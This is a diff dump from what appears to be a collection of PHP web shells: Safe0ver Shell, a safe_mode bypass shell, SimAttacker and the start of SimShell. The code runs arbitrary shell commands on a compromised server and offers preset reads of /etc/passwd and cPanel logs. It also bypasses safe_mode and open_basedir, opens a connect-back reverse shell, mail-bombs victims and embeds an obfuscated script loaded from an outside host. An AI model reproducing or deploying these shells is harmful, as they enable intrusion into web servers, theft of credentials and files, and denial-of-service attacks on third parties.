echo "Yüklenen Dosya Adi: \"$userfile_name\".\n<br>Dosya Adi: \"$userfile\".\n<br>";
|
||||
echo "Dosya Boyutu: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
|
||||
}
|
||||
else {
|
||||
echo "Yüklenemedi...";
|
||||
}
|
||||
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
|
||||
echo "<br><br></td></tr></table></center>";
|
||||
}
|
||||
elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
|
||||
echo "<hr>";
|
||||
$fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) {
|
||||
echo spacetonbsp(@htmlentities($line))."<br>\n";
|
||||
}
|
||||
echo "<hr>";
|
||||
}
|
||||
elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
|
||||
if (function_exists('is_dir')) {
|
||||
if (is_dir("$oldfile")) {
|
||||
$objname = "Directory";
|
||||
$objident = "Directory";
|
||||
}
|
||||
else {
|
||||
$objname = "Filename";
|
||||
$objident = "file";
|
||||
}
|
||||
}
|
||||
echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center> Rename a file: </center></td></tr></table><br>\n";
|
||||
If (empty($newfile) != true) {
|
||||
echo "<center>";
|
||||
$return = @rename($oldfile, "$olddir$newfile");
|
||||
if ($return) {
|
||||
echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
|
||||
}
|
||||
else {
|
||||
if ( @file_exists("$olddir$newfile") ) {
|
||||
echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
|
||||
}
|
||||
else {
|
||||
echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
|
||||
}
|
||||
}
|
||||
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
|
||||
}
|
||||
else {
|
||||
$dpos = strrpos($oldfile, "/");
|
||||
if (strval($dpos)!="") {
|
||||
$olddir = substr($oldfile, 0, $dpos+1);
|
||||
}
|
||||
else {
|
||||
$olddir = "$lastdir/";
|
||||
}
|
||||
$fpos = strrpos($oldfile, "/");
|
||||
if (strval($fpos)!="") {
|
||||
$inputfile = substr($oldfile, $fpos+1);
|
||||
}
|
||||
else {
|
||||
$inputfile = "";
|
||||
}
|
||||
echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
|
||||
echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
|
||||
echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
|
||||
echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
|
||||
echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
|
||||
echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
|
||||
echo "Rename \"$oldfile\" to:<br>\n";
|
||||
echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">";
|
||||
echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
|
||||
echo "</td></tr></table></center>";
|
||||
}
|
||||
}
|
||||
else if ( $cmd == "con") {
|
||||
|
||||
?>
|
||||
<center>
|
||||
<table>
|
||||
<tr><td> </td>
|
||||
</tr></table>
|
||||
<?php
|
||||
}
|
||||
else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
|
||||
$isMainMenu = true;
|
||||
?>
|
||||
<table width="100%" border="0" cellpadding="0" cellspacing="0">
|
||||
<tr>
|
||||
<td width="100%" class="border">
|
||||
<center> -<[{ <?php echo $scriptTitle ?> Main Menu }]>- </center>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<br>
|
||||
<center>
|
||||
<table border="0" NOWRAP>
|
||||
<tr>
|
||||
<td valign="top" class="silver border">
|
||||
<?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>##Safe0ver##</strong></font>", "cmd=dir&dir=.").sp(2); ?> </td>
|
||||
<td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP><span class="style5"> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass Özelligi Eklenmis Ve Böylece Tahrip Gücü Yükseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya Sömüren yazilimlar Icermemektedir.<p>--------------------------<p>Bypass Kullaným:<b>Cat /home/evilc0der/public_html/config.php</b> Gibi Olmalidir.<br>
|
||||
</span></td>
|
||||
</tr>
|
||||
</table>
|
||||
<br><p><br>Safe Mode ByPAss<p><form method="POST">
|
||||
<p align="center"><input type="text" size="40" value="<? if($_POST['dizin'] != "") { echo $_POST['dizin']; } else echo $klasor;?>" name="dizin">
|
||||
<input type="submit" value="Çalistir"></p>
|
||||
</form>
|
||||
<form method="POST">
|
||||
<p align="center"><select size="1" name="dizin">
|
||||
<option value="uname -a;id;pwd;hostname">Sistem Bilgisi</option>
|
||||
<option value="cat /etc/passwd">cat /etc/passwd</option>
|
||||
<option value="cat /var/cpanel/accounting.log">cat /var/cpanel/accounting.log</option>
|
||||
<option value="cat /etc/syslog.conf">cat /etc/syslog.conf</option>
|
||||
<option value="cat /etc/hosts">cat /etc/hosts</option>
|
||||
<option value="cat /etc/named.conf">cat /etc/named.conf</option>
|
||||
<option value="cat /etc/httpd/conf/httpd.conf">cat /etc/httpd/conf/httpd.conf</option>
|
||||
<option value="netstat -an | grep -i listen">Açik Portlar</option>
|
||||
<option value="ps -aux">Çalisan Uygulamalar</option>
|
||||
</select> <input type="submit" value="Çalistir"></p>
|
||||
</form>
|
||||
------------------------------------------------------------------------------------<p>
|
||||
<?
|
||||
$evilc0der=$_POST['dizin'];
|
||||
if($_POST['dizin'])
|
||||
{
|
||||
ini_restore("safe_mode");
|
||||
ini_restore("open_basedir");
|
||||
$safemodgec = shell_exec($evilc0der);
|
||||
echo "<textarea rows=17 cols=85>$safemodgec</textarea>";
|
||||
}
|
||||
?>
|
||||
<Script Language='Javascript'>
|
||||
<!-- HTML Encryption provided by iWEBTOOL.com -->
|
||||
<!--
|
||||
document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%65%76%69%6C%63%30%64%65%72%2E%6F%72%67%2F%6C%6F%67%7A%2F%79%61%7A%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E'));
|
||||
//-->
|
||||
</Script>
|
||||
</center>
|
||||
<br>
|
||||
<?php
|
||||
}
|
||||
|
||||
if ($cmd != "downl") {
|
||||
if ( $isMainMenu != true) {
|
||||
?>
|
||||
|
||||
<table width="100%" border="0" cellpadding="0" cellspacing="0">
|
||||
<tr>
|
||||
<td width="100%" style="class="silver border">
|
||||
<center><strong>
|
||||
<?php echo buildUrl("<font color=\"navy\">[ Main Menu ] </font>", "cmd=&dir="); ?>
|
||||
|
||||
<?php echo buildUrl("<font color=\"navy\">[ R00T ] </font>", "cmd=dir&dir=."); ?>
|
||||
</strong></center>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<br>
|
||||
<?php
|
||||
}
|
||||
?>
|
||||
<table width=100% border="0" cellpadding="0" cellspacing="0">
|
||||
<tr>
|
||||
<td width="100%" class="silver border">
|
||||
<center> <?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?> </center>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<?php
|
||||
}
|
||||
|
||||
?>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
@ -0,0 +1,89 @@
|
|||
<head>
|
||||
<meta http-equiv="Content-Language" content="en-us">
|
||||
</head>
|
||||
<STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style>
|
||||
<p align="center"><b><font face="Webdings" size="6" color="#FF0000">!</font><font face="Verdana" size="5" color="#DADADA"><a href="? "><span style="color: #DADADA; text-decoration: none; font-weight:700"><font face="Times New Roman">Safe
|
||||
Mode Shell v1.0</font></span></a></font><font face="Webdings" size="6" color="#FF0000">!</font></b></p>
|
||||
<form method="POST">
|
||||
<p align="center"><input type="text" name="file" size="20">
|
||||
<input type="submit" value="Open" name="B1"></p>
|
||||
</form>
|
||||
<form method="POST">
|
||||
<p align="center"><select size="1" name="file">
|
||||
<option value="/etc/passwd">Get /etc/passwd</option>
|
||||
<option value="/var/cpanel/accounting.log">View cpanel logs</option>
|
||||
<option value="/etc/syslog.conf">Syslog configuration</option>
|
||||
<option value="/etc/hosts">Hosts</option>
|
||||
</select> <input type="submit" value="Go" name="B1"></p>
|
||||
</form>
|
||||
|
||||
|
||||
<?php
|
||||
/*
|
||||
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
|
||||
by PHP Emperor<xb5@hotmail.com>
|
||||
*/
|
||||
|
||||
echo "<head><title>Safe Mode Shell</title></head>";
|
||||
|
||||
|
||||
|
||||
|
||||
$tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp
|
||||
|
||||
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
|
||||
{
|
||||
$safemode = true;
|
||||
$hsafemode = "<font color=\"red\">ON (secure)</font>";
|
||||
}
|
||||
else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
|
||||
echo("Safe-mode: $hsafemode");
|
||||
$v = @ini_get("open_basedir");
|
||||
if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
|
||||
else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
|
||||
echo("<br>");
|
||||
echo("Open base dir: $hopenbasedir");
|
||||
echo("<br>");
|
||||
echo "Disable functions : <b>";
|
||||
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
|
||||
$free = @diskfreespace($dir);
|
||||
if (!$free) {$free = 0;}
|
||||
$all = @disk_total_space($dir);
|
||||
if (!$all) {$all = 0;}
|
||||
$used = $all-$free;
|
||||
$used_percent = @round(100/($all/$free),2);
|
||||
|
||||
echo "<PRE>\n";
|
||||
if(empty($file)){
|
||||
if(empty($_GET['file'])){
|
||||
if(empty($_POST['file'])){
|
||||
die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n <B><CENTER><FONT
|
||||
COLOR=\"RED\">PHP Emperor
|
||||
xb5@hotmail.com</FONT></CENTER></B>");
|
||||
} else {
|
||||
$file=$_POST['file'];
|
||||
}
|
||||
} else {
|
||||
$file=$_GET['file'];
|
||||
}
|
||||
}
|
||||
|
||||
$temp=tempnam($tymczas, "cx");
|
||||
|
||||
if(copy("compress.zlib://".$file, $temp)){
|
||||
$zrodlo = fopen($temp, "r");
|
||||
$tekst = fread($zrodlo, filesize($temp));
|
||||
fclose($zrodlo);
|
||||
echo "<B>--- Start File ".htmlspecialchars($file)."
|
||||
-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File
|
||||
".htmlspecialchars($file)." ---------------\n";
|
||||
unlink($temp);
|
||||
die("\n<FONT COLOR=\"RED\"><B>File
|
||||
".htmlspecialchars($file)." has been already loaded. PHP Emperor <xb5@hotmail.com>
|
||||
;]</B></FONT>");
|
||||
} else {
|
||||
die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
|
||||
<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
|
||||
access.</CENTER></FONT>");
|
||||
}
|
||||
?>
|
|
@ -0,0 +1,378 @@
|
|||
<?
|
||||
//download Files Code
|
||||
$fdownload=$_GET['fdownload'];
|
||||
if ($fdownload <> "" ){
|
||||
// path & file name
|
||||
$path_parts = pathinfo("$fdownload");
|
||||
$entrypath=$path_parts["basename"];
|
||||
$name = "$fdownload";
|
||||
$fp = fopen($name, 'rb');
|
||||
header("Content-Disposition: attachment; filename=$entrypath");
|
||||
header("Content-Length: " . filesize($name));
|
||||
fpassthru($fp);
|
||||
exit;
|
||||
}
|
||||
?>
|
||||
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<meta http-equiv="Content-Language" content="en-us">
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
|
||||
<title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title>
|
||||
<style>
|
||||
<!--
|
||||
body { font-family: Tahoma; font-size: 8pt }
|
||||
-->
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<?
|
||||
error_reporting(E_ERROR | E_WARNING | E_PARSE);
|
||||
|
||||
//File Edit
|
||||
$fedit=$_GET['fedit'];
|
||||
if ($fedit <> "" ){
|
||||
$fedit=realpath($fedit);
|
||||
$lines = file($fedit);
|
||||
echo "<form action='' method='POST'>";
|
||||
echo "<textarea name='savefile' rows=30 cols=80>" ;
|
||||
foreach ($lines as $line_num => $line) {
|
||||
echo htmlspecialchars($line);
|
||||
}
|
||||
echo "</textarea>
|
||||
<input type='text' name='filepath' size='60' value='$fedit'>
|
||||
<input type='submit' value='save'></form>";
|
||||
$savefile=$_POST['savefile'];
|
||||
$filepath=realpath($_POST['filepath']);
|
||||
if ($savefile <> "")
|
||||
{
|
||||
$fp=fopen("$filepath","w+");
|
||||
fwrite ($fp,"") ;
|
||||
fwrite ($fp,$savefile) ;
|
||||
fclose($fp);
|
||||
echo "<script language='javascript'> close()</script>";
|
||||
}
|
||||
exit();
|
||||
}
|
||||
?>
|
||||
<?
|
||||
// CHmod - PRimission
|
||||
$fchmod=$_GET['fchmod'];
|
||||
if ($fchmod <> "" ){
|
||||
$fchmod=realpath($fchmod);
|
||||
echo "<center><br>
|
||||
chmod for :$fchmod<br>
|
||||
<form method='POST' action=''><br>
|
||||
Chmod :<br>
|
||||
<input type='text' name='chmod0' ><br>
|
||||
<input type='submit' value='change chmod'>
|
||||
</form>";
|
||||
$chmod0=$_POST['chmod0'];
|
||||
if ($chmod0 <> ""){
|
||||
chmod ($fchmod , $chmod0);
|
||||
}else {
|
||||
echo "primission Not Allow change Chmod";
|
||||
}
|
||||
exit();
|
||||
}
|
||||
?>
|
||||
|
||||
<div align="center">
|
||||
<table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">
|
||||
<tr>
|
||||
<td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">
|
||||
<p align="center"><b>
|
||||
<font face="Tahoma" size="2"><br>
|
||||
</font>
|
||||
<font color="#D2D200" face="Tahoma" size="2">
|
||||
<span style="text-decoration: none">
|
||||
<font color="#000000">
|
||||
<a href="?id=fm&dir=<?
|
||||
echo getcwd();
|
||||
?>
|
||||
">
|
||||
<span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p>
|
||||
<p align="center"><b><a href="?id=cmd">
|
||||
<span style="text-decoration: none">
|
||||
<font face="Tahoma" size="2" color="#000000">
|
||||
CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p>
|
||||
<p align="center"><b><a href="?id=fake-mail">
|
||||
<font face="Tahoma" size="2" color="#000000">
|
||||
<span style="text-decoration: none">Fake mail</span></font></a></b></p>
|
||||
<p align="center"><b>
|
||||
<font face="Tahoma" size="2" color="#000000">
|
||||
<a href="?id=cshell">
|
||||
<span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p>
|
||||
<p align="center"><b>
|
||||
<font color="#000000" face="Tahoma" size="2">
|
||||
<a href="?id=">
|
||||
<span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p>
|
||||
<p> <p align="center"> </td>
|
||||
<td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">
|
||||
<?
|
||||
//*******************************************************
|
||||
//Start Programs About US
|
||||
$id=$_GET['id'];
|
||||
|
||||
if ($id=="") {
|
||||
echo "
|
||||
<font face='Arial Black' color='#808080' size='1'>
|
||||
***************************************************************************<br>
|
||||
Iranian Hackers : WWW.SIMORGH-EV.COM <br>
|
||||
Programer : Hossein Asgary <br>
|
||||
Note : SimAttacker Have copyright from simorgh security Group <br>
|
||||
please : If you find bug or problems in program , tell me by : <br>
|
||||
e-mail : admin(at)simorgh-ev(dot)com<br>
|
||||
Enjoy :) [Only 4 Best Friends ] <br>
|
||||
***************************************************************************</font></span></p>
|
||||
";
|
||||
|
||||
echo "<font color='#333333' size='2'>OS :". php_uname();
|
||||
echo "<br>IP :".
|
||||
($_SERVER['REMOTE_ADDR']);
|
||||
echo "</font>";
|
||||
|
||||
|
||||
}
|
||||
//************************************************************
|
||||
//cmd-command line
|
||||
$cmd=$_POST['cmd'];
|
||||
if($id=="cmd"){
|
||||
$result=shell_exec("$cmd");
|
||||
echo "<br><center><h3> CMD ExeCute </h3></center>" ;
|
||||
echo "<center>
|
||||
<textarea rows=20 cols=70 >$result</textarea><br>
|
||||
<form method='POST' action=''>
|
||||
<input type='hidden' name='id' value='cmd'>
|
||||
<input type='text' size='80' name='cmd' value='$cmd'>
|
||||
<input type='submit' value='cmd'><br>";
|
||||
|
||||
|
||||
|
||||
}
|
||||
|
||||
//********************************************************
|
||||
|
||||
//fake mail = Use victim server 4 DOS - fake mail
|
||||
if ( $id=="fake-mail"){
|
||||
error_reporting(0);
|
||||
echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ;
|
||||
echo "<center><form method='post' action=''>
|
||||
Victim Mail :<br><input type='text' name='to' ><br>
|
||||
Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br>
|
||||
Comments:
|
||||
<br>
|
||||
<textarea rows='10' cols=50 name='Comments' ></textarea><br>
|
||||
<input type='submit' value='Send Mail Strm ' >
|
||||
</form></center>";
|
||||
//send Storm Mail
|
||||
$to=$_POST['to'];
|
||||
$nom=$_POST['nom'];
|
||||
$Comments=$_POST['Comments'];
|
||||
if ($to <> "" ){
|
||||
for ($i = 0; $i < $nom ; $i++){
|
||||
$from = rand (71,1020000000)."@"."Attacker.com";
|
||||
$subject= md5("$from");
|
||||
mail($to,$subject,$Comments,"From:$from");
|
||||
echo "$i is ok";
|
||||
}
|
||||
echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>";
|
||||
}
|
||||
}
|
||||
//********************************************************
|
||||
|
||||
//Connect Back -Firewall Bypass
|
||||
if ($id=="cshell"){
|
||||
echo "<br>Connect back Shell , bypass Firewalls<br>
|
||||
For user :<br>
|
||||
nc -l -p 1019 <br>
|
||||
<hr>
|
||||
<form method='POST' action=''><br>
|
||||
Your IP & BindPort:<br>
|
||||
<input type='text' name='mip' >
|
||||
<input type='text' name='bport' size='5' value='1019'><br>
|
||||
<input type='submit' value='Connect Back'>
|
||||
</form>";
|
||||
$mip=$_POST['mip'];
|
||||
$bport=$_POST['bport'];
|
||||
if ($mip <> "")
|
||||
{
|
||||
$fp=fsockopen($mip , $bport , $errno, $errstr);
|
||||
if (!$fp){
|
||||
$result = "Error: could not open socket connection";
|
||||
}
|
||||
else {
|
||||
fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00 ready 2 USe\n*********************************************\n\n");
|
||||
while(!feof($fp)){
|
||||
fputs ($fp," bash # ");
|
||||
$result= fgets ($fp, 4096);
|
||||
$message=`$result`;
|
||||
fputs ($fp,"--> ".$message."\n");
|
||||
}
|
||||
fclose ($fp);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
//********************************************************
|
||||
//Spy File Manager
|
||||
$homedir=getcwd();
|
||||
$dir=realpath($_GET['dir'])."/";
|
||||
if ($id=="fm"){
|
||||
echo "<br><b><p align='left'> Home:</b> $homedir
|
||||
<b>
|
||||
<form action='' method='GET'>
|
||||
Path:</b>
|
||||
<input type='hidden' name='id' value='fm'>
|
||||
<input type='text' name='dir' size='80' value='$dir'>
|
||||
<input type='submit' value='dir'>
|
||||
</form>
|
||||
<br>";
|
||||
|
||||
echo "
|
||||
|
||||
<div align='center'>
|
||||
|
||||
<table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>
|
||||
<tr>
|
||||
<td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td>
|
||||
<td height='28' width='82' align='center'>
|
||||
<font color='#000080' size='2'><b>Size KByte</b></font></td>
|
||||
<td height='28' width='83' align='center'>
|
||||
<font color='#008000' size='2'><b>Download</b></font></td>
|
||||
<td height='28' width='66' align='center'>
|
||||
<font color='#FF9933' size='2'><b>Edit</b></font></td>
|
||||
<td height='28' width='75' align='center'>
|
||||
<font color='#999999' size='2'><b>Chmod</b></font></td>
|
||||
<td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td>
|
||||
</tr>";
|
||||
if (is_dir($dir)){
|
||||
if ($dh=opendir($dir)){
|
||||
while (($file = readdir($dh)) !== false) {
|
||||
$fsize=round(filesize($dir . $file)/1024);
|
||||
|
||||
|
||||
echo "
|
||||
<tr>
|
||||
<th width='250' height='22' align='left' nowrap>";
|
||||
if (is_dir($dir.$file))
|
||||
{
|
||||
echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'> $file <font color='#FF0000' size='1'>dir</font>";
|
||||
}
|
||||
else {
|
||||
echo "<font size='2' color='#666666'> $file ";
|
||||
}
|
||||
echo "</a></font></th>
|
||||
<td width='113' align='center' nowrap><font color='#000080' size='2'><b>";
|
||||
if (is_file($dir.$file))
|
||||
{
|
||||
echo "$fsize";
|
||||
}
|
||||
else {
|
||||
echo " ";
|
||||
}
|
||||
echo "
|
||||
</b></font></td>
|
||||
<td width='103' align='center' nowrap>";
|
||||
if (is_file($dir.$file)){
|
||||
if (is_readable($dir.$file)){
|
||||
echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download";
|
||||
}else {
|
||||
echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
|
||||
}
|
||||
}else {
|
||||
echo " ";
|
||||
}
|
||||
echo "
|
||||
</a></font></td>
|
||||
<td width='77' align='center' nowrap>";
|
||||
if (is_file($dir.$file))
|
||||
{
|
||||
if (is_readable($dir.$file)){
|
||||
echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit";
|
||||
}else {
|
||||
echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
|
||||
}
|
||||
}else {
|
||||
echo " ";
|
||||
}
|
||||
echo "
|
||||
</a></font></td>
|
||||
<td width='86' align='center' nowrap>";
|
||||
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
|
||||
echo "<font size='1' color='#999999'>Dont in windows";
|
||||
}
|
||||
else {
|
||||
echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod";
|
||||
}
|
||||
echo "</a></font></td>
|
||||
<td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td>
|
||||
</tr>
|
||||
";
|
||||
}
|
||||
closedir($dh);
|
||||
}
|
||||
}
|
||||
echo "</table>
|
||||
<form enctype='multipart/form-data' action='' method='POST'>
|
||||
<input type='hidden' name='MAX_FILE_SIZE' value='300000' />
|
||||
Send this file: <input name='userfile' type='file' />
|
||||
<inpt type='hidden' name='Fupath' value='$dir'>
|
||||
<input type='submit' value='Send File' />
|
||||
</form>
|
||||
</div>";
|
||||
}
|
||||
//Upload Files
|
||||
$rpath=$_GET['dir'];
|
||||
if ($rpath <> "") {
|
||||
$uploadfile = $rpath."/" . $_FILES['userfile']['name'];
|
||||
print "<pre>";
|
||||
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
|
||||
echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>";
|
||||
echo "<script language='javascript'> history.back(2)</script>";
|
||||
}
|
||||
}
|
||||
//file deleted
|
||||
$frpath=$_GET['fdelete'];
|
||||
if ($frpath <> "") {
|
||||
if (is_dir($frpath)){
|
||||
$matches = glob($frpath . '/*.*');
|
||||
if ( is_array ( $matches ) ) {
|
||||
foreach ( $matches as $filename) {
|
||||
unlink ($filename);
|
||||
rmdir("$frpath");
|
||||
echo "<script language='javascript'> alert('Success! Please refresh')</script>";
|
||||
echo "<script language='javascript'> history.back(1)</script>";
|
||||
}
|
||||
}
|
||||
}
|
||||
else{
|
||||
echo "<script language='javascript'> alert('Success! Please refresh')</script>";
|
||||
unlink ("$frpath");
|
||||
echo "<script language='javascript'> history.back(1)</script>";
|
||||
exit(0);
|
||||
|
||||
}
|
||||
|
||||
|
||||
}
|
||||
?>
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td style="border: 1px dotted #FFCC66">
|
||||
<p align="center"><font color="#666666" size="1" face="Tahoma"><br>
|
||||
Copyright 2004-Simorgh Security<br>
|
||||
Hossein-Asgari<br>
|
||||
</font><font color="#c0c0c0" size="1" face="Tahoma">
|
||||
<a style="TEXT-DECORATION: none" href="http://www.simorgh-ev.com">
|
||||
<font color="#666666">www.simorgh-ev.com</font></a></font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
</body>
|
||||
|
||||
</html>
|
180
xakep-shells/PHP/SimShell 1.0 - Simorgh Security MGZ.php.txt
Normal file
180
xakep-shells/PHP/SimShell 1.0 - Simorgh Security MGZ.php.txt
Normal file
|
@ -0,0 +1,180 @@
|
|||
<?php
|
||||
|
||||
/*Simorgh Security Magazine */
|
||||
session_start();
|
||||
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
|
||||
$_SESSION['cwd'] = getcwd();
|
||||
$_SESSION['history'] = array();
|
||||
$_SESSION['output'] = '';
|
||||
}
|
||||
|
||||
if (!empty($_REQUEST['command'])) {
|
||||
if (get_magic_quotes_gpc()) {
|
||||
$_REQUEST['command'] = stripslashes($_REQUEST['command']);
|
||||
}
|
||||
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
|
||||
unset($_SESSION['history'][$i]);
|
||||
|
||||
array_unshift($_SESSION['history'], $_REQUEST['command']);
|
||||
|
||||
$_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
|
||||
|
||||
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
|
||||
$_SESSION['cwd'] = dirname(__FILE__);
|
||||
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
|
||||
|
||||
if ($regs[1][0] == '/') {
|
||||
|
||||
$new_dir = $regs[1];
|
||||
} else {
|
||||
|
